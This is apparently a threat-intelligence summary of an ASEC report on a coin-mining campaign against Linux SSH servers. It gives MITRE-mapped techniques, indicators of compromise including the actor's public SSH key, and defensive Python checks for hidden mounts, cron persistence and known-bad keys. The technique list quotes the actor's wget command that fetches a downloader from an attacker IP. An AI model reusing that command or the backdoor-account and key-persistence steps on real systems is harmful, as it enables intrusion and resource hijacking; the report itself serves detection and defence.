CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers – ASEC BLOG

ASEC reports ongoing campaigns in which the XMRig CoinMiner is installed on poorly managed Linux SSH servers, using SHC-built malware and creating backdoor SSH accounts for persistence. The attacks, attributed to the KONO DIO DA threat actor, begin with brute-force and dictionary attacks against exposed SSH services and proceed through a multi-stage downloader chain that ends with the miner running under a disguised process name. Hashtags: #KONO_DIO_DA #XMRig

Keypoints

  • CoinMiner (XMRig) is deployed on poorly managed Linux SSH servers, using SHC to package the malware and adding a backdoor SSH account for future access.
  • The attacks typically begin with dictionary or brute-force login attempts against publicly exposed SSH services to gain initial access.
  • Once inside, a multi-stage downloader chain is used: a downloader (am) compiled with SHC downloads another downloader (nw), which then retrieves and executes the XMRig miner and multiple Bash scripts.
  • The XMRig miner runs under a disguised process name (dbus-daemon) and uses a configured mining setup with multiple pools and wallets; cron is used to restart mining and maintain persistence.
  • Past campaigns used more complex features, including registering the actor's SSH public key (the “key” file) in authorized_keys to permit future logins and a backdoor user (e.g., “cheeki”) for ongoing access.
  • Defensive evasion includes removing security tools (Aegis/Kinsing) and hiding the miner’s process via filesystem tricks; activities are orchestrated through a cron-based persistence mechanism.

MITRE Techniques

  • [T1110] Brute Force – Brute forcing or dictionary attacks against exposed Linux SSH servers to gain initial access. “If simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force or a dictionary attack.”
  • [T1098.004] SSH Authorized Keys – Persistence via backdoor SSH key; threat actor copies their public key to “~/.ssh/authorized_keys” for future logins. “The threat actor creates and registers their public key, which is the ‘key’ file, to the ‘~/.ssh/authorized_keys’ path.”
  • [T1136.003] Create Account – Persistence by creating a new backdoor account (e.g., “cheeki”) and altering passwords on existing accounts. “usermod command to add an account called ‘cheeki’… the password is changed by the threat actor.”
  • [T1053.005] Cron – A cron task (e.g., “nano.backup”) re-runs the mining scripts to restart the miner and maintain persistence. “registered the cron task, which executes the ‘root.sh’ Bash script and ‘root.sh’ every minute.”
  • [T1036] Masquerading – The miner is executed under the name of a legitimate process (dbus-daemon) to blend in with normal system activity. “XMRig is executed under the disguised name of a normal process, ‘dbus-daemon’.”
  • [T1105] Ingress Tool Transfer – Downloader chain downloads components from remote servers (e.g., wget to fetch “am”). “# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; …”
  • [T1027] Obfuscated/Compressed Files – The initial downloader is SHC-generated (a Bash script converted into a binary), indicating obfuscated/packed content. “The downloaded “am” file is malware that has been developed with SHC.”
  • [T1562] Impair Defenses – Attempts to disable or remove security tooling (e.g., uninstall.sh removing the Ali cloud shield and other monitor tools). “uninstall.sh… removing the Ali cloud shield (Ann Knight) of the security service Alibaba Cloud.”
  • [T1564] Hide Artifacts – Techniques to hide the miner process (mounting /var/tmp and bind-mounting to /proc to conceal the PID). “init.sh is an SHC ELF file… uses the mount command to bind the directory to the /proc file system on the PID of the miner process.”
  • [T1496] Resource Hijacking – Mining Monero using XMRig to utilize system resources for cryptocurrency mining. “XMRig CoinMiner” and mining configuration are present in the payloads.
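As an added defender-side example (not code from the ASEC post), the checks below parse constructed /proc/self/mountinfo, crontab and authorized_keys samples for three of the artefacts listed above: a mount placed over /proc/<pid> (T1564), cron entries invoking root.sh or referencing nano.backup (T1053.005), and a known-bad key blob in authorized_keys (T1098.004). The key blob and all sample lines are constructed placeholders; on a live host the same functions can be fed the real files.

```python
import re

# Constructed sample inputs (not captured from the ASEC post): a mountinfo with one bind mount
# of /var/tmp over /proc/4242, a crontab with an every-minute root.sh task, and an
# authorized_keys file holding a placeholder blob standing in for the actor's key.
SAMPLE_MOUNTINFO = """\
22 28 0:21 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
28 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw
120 22 8:1 /var/tmp /proc/4242 rw,relatime - ext4 /dev/sda1 rw
"""
SAMPLE_CRONTAB = "* * * * * /root/.nano.backup/root.sh >/dev/null 2>&1\n0 3 * * * /usr/bin/certbot renew\n"
SAMPLE_KEY_BLOB = "AAAAB3NzaC1yc2EAAAADAQABAAABAQC0constructedPlaceholderBlob"  # constructed, not the real key
SAMPLE_AUTHORIZED_KEYS = "ssh-rsa " + SAMPLE_KEY_BLOB + " rsa-key\n"

PROC_PID_MOUNT = re.compile(r"^/proc/(\d+)(?:/|$)")  # mount point directly on a PID directory

def find_proc_pid_mounts(mountinfo_text):
    """Mounts whose mount point sits on /proc/<pid>: the trick used to hide the miner's PID.
    proc(5) layout: id parent maj:min root mountpoint opts [optional...] - fstype source superopts.
    Mount points escape whitespace as octal, so splitting on whitespace is safe."""
    hits = []
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if len(fields) < 10 or "-" not in fields:
            continue
        m = PROC_PID_MOUNT.match(fields[4])
        if m:
            hits.append({"pid": int(m.group(1)), "root": fields[3],
                         "fstype": fields[fields.index("-") + 1]})
    return hits

def find_suspicious_cron(crontab_text, markers=("root.sh", "nano.backup")):
    """Command parts of crontab lines that reference the persistence artefacts named in the post."""
    out = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        cmd = line.split(None, 5)[-1]  # five schedule fields (or an @keyword), then the command
        if any(mark in cmd for mark in markers):
            out.append(cmd)
    return out

def find_known_keys(authorized_keys_text, bad_blobs):
    """authorized_keys lines whose base64 blob is in the known-bad set (options prefix tolerated)."""
    found = []
    for line in authorized_keys_text.splitlines():
        if any(field in bad_blobs for field in line.split()):
            found.append(line)
    return found
```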

Indicators of Compromise

  • [IP] 23.224.232[.]68 – Login source for dictionary attacks and attacks against SSH servers (Table 1).
  • [IP] 46.41.150[.]129 – Download URL for downloader (am) and related components.
  • [IP] 2.58.149[.]237 – Past/downloader server hosting files (hoze, xri2.tar).
  • [Domain] doi-2020[.]net – Mining pool domain and wallet associations.
  • [Domain] pool.hashvault[.]pro – Mining pool domain.
  • [Domain] pool.supportxmr[.]com – Mining pool domain.
  • [IP] 141.95.19[.]91 – Download / command-and-control related address.
  • [Hash] ea30afd4f65f8866bebcaf92168f3241 – Latest version of the downloader (am).
  • [Hash] 1192697ed3d2302bec3ee828c154e300 – Latest version of the downloader Bash script (nw).
  • [Hash] 1db93cb95e409769561efb66e4fd5c72 – Bash script (start).
  • [Hash] 6e9001516053770f6dd645954240bced – Bash script (admin).
  • [Hash] a978aec11a072855e2cfba593160886e – Bash script (root.sh).
  • [Hash] 4f1661d873cef8a3fa3ca34080816e87 – XMRig CoinMiner (dbus-daemon invocation).
  • [Hash] 20ac8a45d129e3ce3444494d9672692c – XMRig Configuration File (config.json).
  • [SSH Key] ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key – Public SSH key used for authorized_keys.
  • [File] am – SHC-compiled downloader binary; nw – secondary downloader script; start/admin/root.sh – Bash script components.
  • [Cron] nano.backup – Cron job/file name used for persistence.

Read more: https://asec.ahnlab.com/en/51908/